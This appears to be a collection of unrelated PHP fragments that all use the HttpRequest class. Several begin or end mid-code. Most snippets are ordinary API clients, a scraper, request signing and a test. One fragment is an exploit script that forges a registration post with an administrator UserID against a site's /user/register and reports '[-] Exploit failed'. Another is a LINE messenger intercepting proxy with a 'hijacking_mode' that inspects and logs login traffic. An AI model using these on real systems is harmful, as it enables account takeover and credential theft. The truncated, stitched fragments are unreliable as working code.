public function ajaxAction() { $this->view = new Lupin_View(); $method = strtolower($this->_request->getParam('method')); $query_uri = trim($this->_request->getParam('query_uri'), '/ '); $url = $this->_request->getParam('url'); $ssl = $this->_request->getParam('ssl'); $extraParams = $this->_request->getParam('param'); $params = array(); if (!empty($extraParams)) { foreach ($extraParams as $newParam) { $parms = explode('=', $newParam, 2); if (count($parms) > 1) { list($key, $value) = $parms; $params[$key] = $value; } } } $newMethod = HTTP_METH_GET; switch ($method) { case 'get': $newMethod = HTTP_METH_GET; break; case 'post': $newMethod = HTTP_METH_POST; break; case 'put': $newMethod = HTTP_METH_PUT; break; case 'delete': $newMethod = HTTP_METH_DELETE; break; case 'head': $newMethod = HTTP_METH_HEAD; break; } $email = $this->_request->getParam('email'); $pass = $this->_request->getParam('secretKey'); $request_url = 'http' . ($ssl !== null ? 's' : '') . '://' . $url . '/' . $query_uri; $httpOptions = array(); if ($email && $pass) { $httpOptions = array('headers' => array('Accept' => '*/*'), 'httpauth' => $email . ':' . $pass, 'httpauthtype' => HTTP_AUTH_DIGEST); } $request = new HttpRequest($request_url, $newMethod, $httpOptions); if ("post" == $method) { $request->addPostFields($params); } else { $request->addQueryData($params); } $res = $request->send(); $responseInfo = $request->getResponseInfo(); $response = array('request_url' => $responseInfo['effective_url'], 'response_headers' => $this->collapseHeaders($res->getHeaders()), 'content' => $res->getBody(), 'status' => $res->getResponseCode(), 'method' => strtoupper($method), 'request_post_fields' => http_build_query(!is_null($postFields = $request->getPostFields()) ? $postFields : array())); $this->view->renderJson($response); }
/** * Query past cashpot draws by date. * @param day a two digit representation of the day eg. 09 * @param month a three letter representation of the month eg. Jan * @param year a two digit representation of the year eg. 99 * @return the raw html from the page returned by querying a past cashpot draw. */ function query_draw_history($day, $month, $year) { $url = "http://www.nlcb.co.tt/search/cpq/cashQuery.php"; $fields = array('day' => $day, 'month' => $month, 'year' => $year); $request = new HttpRequest($url, HttpRequest::METH_POST); $request->addPostFields($fields); try { $request->send(); if ($request->getResponseCode() == 200) { $response = $request->getResponseBody(); } else { throw new Exception("Request for {$url} was unsuccessful. A " . $request->getResponseCode() . " response code was returned."); } } catch (HttpException $e) { echo $e->getMessage(); throw $e; } return $response; }
/** * Remove the specified resource * @return [type] [description] */ function destroy($id) { $where = "id = '{$id}'"; if ($this->model->delete($where)) { $r = new HttpRequest(URL . ':' . USER_CLASS_MICS_PORT . 'delete', HttpRequest::METH_POST); $r->setOptions(array('cookies' => array('lang' => 'en'))); $r->addPostFields(array('data' => '{"class_id":' . $id . '}')); try { echo $r->send()->getBody(); } catch (HttpException $ex) { echo $ex; } } }
public function ajaxAction() { $this->view = new Lupin_View(); $method = strtolower($this->_request->getParam('method')); $query_uri = trim($this->_request->getParam('query_uri'), '/ '); $url = $this->_request->getParam('url'); $extraParams = $this->_request->getParam('param'); $params = array('format' => $this->_request->getParam('format')); if (!empty($extraParams)) { foreach ($extraParams as $newParam) { $parms = explode('=', $newParam, 2); if (count($parms) > 1) { list($key, $value) = $parms; $params[$key] = $value; } } } $newMethod = HTTP_METH_GET; switch ($method) { case 'get': $newMethod = HTTP_METH_GET; break; case 'post': $newMethod = HTTP_METH_POST; break; case 'put': $newMethod = HTTP_METH_PUT; break; case 'delete': $newMethod = HTTP_METH_DELETE; break; case 'head': $newMethod = HTTP_METH_HEAD; break; } $email = $this->_request->getParam('email'); $pass = $this->_request->getParam('secretKey'); $request_url = 'http://' . $url . '/' . $query_uri; $request = new HttpRequest($request_url, $newMethod); if ($email && $pass) { $encoded_auth = base64_encode($email . ':' . $pass); $request->addHeaders(array('Authorization' => 'Basic ' . $encoded_auth)); } if ("post" == $method) { $request->addPostFields($params); } else { $request->addQueryData($params); } $res = $request->send(); function collapseHeaders($headers) { $header_string = ""; foreach ($headers as $name => $value) { $header_string .= $name . ": " . wordwrap($value, 45, "\n\t") . "\n"; } return $header_string; } $responseInfo = $request->getResponseInfo(); $response = array('request_url' => $responseInfo['effective_url'], 'response_headers' => collapseHeaders($res->getHeaders()), 'content' => $res->getBody(), 'status' => $res->getResponseCode(), 'method' => strtoupper($method), 'request_post_fields' => http_build_query(!is_null($postFields = $request->getPostFields()) ? $postFields : array())); $this->view->renderJson($response); }
protected function uploadImage($path) { $http_request = new \HttpRequest('http://image.api.abcp.ru/upload/', \HttpRequest::METH_POST); $http_request->addPostFile('imageFile', $path); $http_request->addPostFields([]); $http_request->send(); $body = $http_request->getResponseBody(); $result = json_decode($body); if ($result->status != '200' || empty($result->response->name)) { print_r($result); echo "image api error: {$path}\n"; exit; } return $result->response->name; }
/** * Signs request with signature version 2 * * Only POST http method is supported * * @param \HttpRequest $request Http request object * @throws QueryClientException */ protected function signRequestV2($request) { $time = time(); //Gets the http method name $httpMethod = self::$httpMethods[$request->getMethod()]; //Gets both host and path from the url $components = parse_url($request->getUrl()); $common = ['AWSAccessKeyId' => $this->awsAccessKeyId, 'SignatureVersion' => '2', 'SignatureMethod' => 'HmacSHA1', 'Timestamp' => gmdate('Y-m-d\\TH:i:s', $time) . "Z"]; $request->addPostFields($common); //Gets adjusted options $options = $request->getPostFields(); //Calculating canonicalized query string ksort($options); $canonicalizedQueryString = ''; foreach ($options as $k => $v) { $canonicalizedQueryString .= '&' . rawurlencode($k) . '=' . rawurlencode($v); } $canonicalizedQueryString = ltrim($canonicalizedQueryString, '&'); $stringToSign = $httpMethod . "\n" . strtolower($components['host']) . "\n" . $components['path'] . "\n" . $canonicalizedQueryString; switch ($common['SignatureMethod']) { case 'HmacSHA1': case 'HmacSHA256': $algo = strtolower(substr($common['SignatureMethod'], 4)); break; default: throw new QueryClientException('Unknown SignatureMethod ' . $common['SignatureMethod']); } $request->addPostFields(['Signature' => base64_encode(hash_hmac($algo, $stringToSign, $this->secretAccessKey, 1))]); $request->addHeaders(['X-Amz-Date' => gmdate(\DateTime::ISO8601, $time)]); }
public function testRemoveUsersCapabilities() { $a = array('RequestMethod' => 'RemoveUserCapabilities', 'OwnerID' => 'efb00dbb-d4ab-46dc-aebc-4ba83288c3c0'); $r = new HttpRequest($this->server_url, HttpRequest::METH_POST); $r->addPostFields($a); $r->send(); echo $r->getRawRequestMessage(); echo "\n"; echo $r->getRawResponseMessage(); echo "\n"; $this->assertEquals(200, $r->getResponseCode()); }
exit(0); } else { $ARG = array(); foreach ($argv as $arg) { if (strpos($arg, '-') === 0) { $key = substr($arg, 1, 1); if (!isset($ARG[$key])) { $ARG[$key] = substr($arg, 3, strlen($arg)); } } } if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s]) { $post_fields = array('ContentObjectAttribute_data_user_login_30' => $ARG[u], 'ContentObjectAttribute_data_user_password_30' => $ARG[p], 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], 'ContentObjectAttribute_data_user_email_30' => $ARG[e], 'UserID' => '14', 'PublishButton' => '1'); $headers = array('User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', 'Referer' => $ARG[s]); $res_http = new HttpRequest($ARG[s] . "/user/register", HttpRequest::METH_POST); $res_http->addPostFields($post_fields); $res_http->addHeaders($headers); try { $response = $res_http->send()->getBody(); if (eregi("success", $response)) { successfully($ARG[u], $ARG[p]); } else { print "[-] Exploit failed"; } } catch (HttpException $exception) { print "[-] Not connected"; exit(0); } } else { help_argc($argv[0]); exit(0);
/** Performs the actual login * @warning Beware of exceptions. * @return TRUE on Success, FALSE on Failure. */ public function login() { try { //Create a new POST request $request = new \HttpRequest($this->_loginURL, \HTTP_METH_POST); //Set the content type $request->setContentType($this->_contentType); //Add POST data $request->addPostFields(array('accountType' => $this->_accountType, 'Email' => $this->_username, 'Passwd' => $this->_password, 'service' => $this->_service, 'source' => $this->_source)); //Should we include Captcha information? if (!empty($this->_captchaText) && !empty($this->_captchaToken)) { $request->addPostFields(array('logintoken' => $this->_captchaToken, 'logincaptcha' => $this->_captchaText)); } // print '------- REQUEST -------------'; // print_r($request); // //Make the request $response = $request->send(); // print '------- RESPONSE ------------'; // print_r($response); //Success? if ($response->getResponseCode() == HTTP_RESPONSE_OK) { //Split the repsonse body into tokens $tokens = explode("\n", $response->getBody()); //Save each token into the session object foreach ($tokens as $id_val) { //Split into token_name= $token = explode('=', $id_val); if (empty($token[0])) { //Skip invalid tokens continue; } //Save the tokens in the session object for future use $_SESSION[$this->getSessionKey() . '::' . $token[0]] = $token[1]; } $this->_success = true; return true; } //Captcha? if ($response->getResponseCode() == HTTP_RESPONSE_FORBIDDEN) { $captchaURL = ''; $captchaToken = ''; //Split the response body into tokens $tokens = explode("\n", $response->getBody()); foreach ($tokens as $id_val) { //This splits the parameters we got from Google into //ID=Value strings. $token[0]=id, $token[1]=value. //'2' allows the token to contain '=' chars $token = explode('=', $id_val, 2); if ($token[0] == 'CaptchaUrl') { $captchaURL = CAPTCHA_URL_PREFIX . trim($token[1]); } elseif ($token[0] == 'CaptchaToken') { $captchaToken = trim($token[1]); } } //Should we throw a CaptchaException? if (!empty($captchaToken) && !empty($captchaURL)) { throw new ClientLoginCaptchaException($captchaURL, $captchaToken); } else { throw new ClientLoginException($request->getBody()); } } } catch (HttpException $e) { throw new ClientLoginException("An error has occurred while trying" . " to login: " . $e->getMessage(), $e); } //For all other responses, return false return false; }
$u = 'http://'; } $u .= $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; if ($_SERVER['REQUEST_URI'] == '/authct/v1/keys/naver' and $offline_mode == 1) { $fp = fopen('authct/v1/keys/naver', 'rb'); header("Content-Type: text/json"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; } if ($_SERVER['REQUEST_URI'] == '/api/v4/TalkService.do') { } #$r = new HttpRequest('https://gd2.line.naver.jp/' . $_SERVER['REQUEST_URI'], HttpRequest::METH_POST); if ($_SERVER['REQUEST_METHOD'] == 'POST') { $r = new HttpRequest($u, HttpRequest::METH_POST); $r->addPostFields($_POST); } else { $r = new HttpRequest($u, HttpRequest::METH_GET); } $r->setOptions(array('cookies' => $_COOKIE, 'proxyhost' => 'localhost', 'proxyport' => 8088, 'proxytype' => HTTP_PROXY_HTTP)); $hdr = array(); foreach (getallheaders() as $key => $val) { $hdr[$key] = $val; } unset($hdr['Accept-Encoding']); $hdr['Content-Type'] = "application/x-thrift"; $r->setHeaders($hdr); $content = $HTTP_RAW_POST_DATA; if ($hijacking_mode == 1 and strrpos($content, "loginWithIdentityCredentialForCertificate_disabled")) { $flag_login = 1; $debug_file = "line.log";
function reddit_POST($subreddit, $to, $data) { global $REDDIT, $modhash, $cookies; $data['uh'] = $modhash; $data['api_type'] = 'json'; if ($subreddit) { $data['r'] = $subreddit; } $request = new HttpRequest("{$REDDIT}/{$to}.json", HttpRequest::METH_POST); $request->addCookies($cookies); $request->addPostFields($data); $response = $request->send(); $status = $response->getResponseCode(); if ($status != 200) { die("/{$to} failed, status={$status}\n"); } return $response; }